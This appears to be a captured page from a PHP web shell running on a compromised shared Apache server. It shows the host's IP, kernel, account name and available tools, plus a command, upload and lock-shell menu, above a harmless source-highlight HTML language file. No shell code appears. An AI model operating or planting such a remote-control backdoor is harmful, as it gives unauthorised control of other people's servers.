hyun.psd; gzuncompress
|
Server IP : 173.236.192.202 / Your IP : 216.73.216.85 Web Server : Apache System : Linux iad1-shared-e1-03 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64 User : andfor18 ( 14551322) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/source-highlight/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
# deal with embedded CSS
state keyword = "<style" nonsensitive begin
include "key_string.lang"
state keyword = '>' begin
keyword = "</style>" nonsensitive exit 2
include "css.lang"
end
end
# deal with embedded Javascript
state keyword = "<script" nonsensitive begin
include "key_string.lang"
state keyword = '>' begin
keyword = "</script>" nonsensitive exit 2
include "javascript.lang"
end
end
include "html_simple.lang"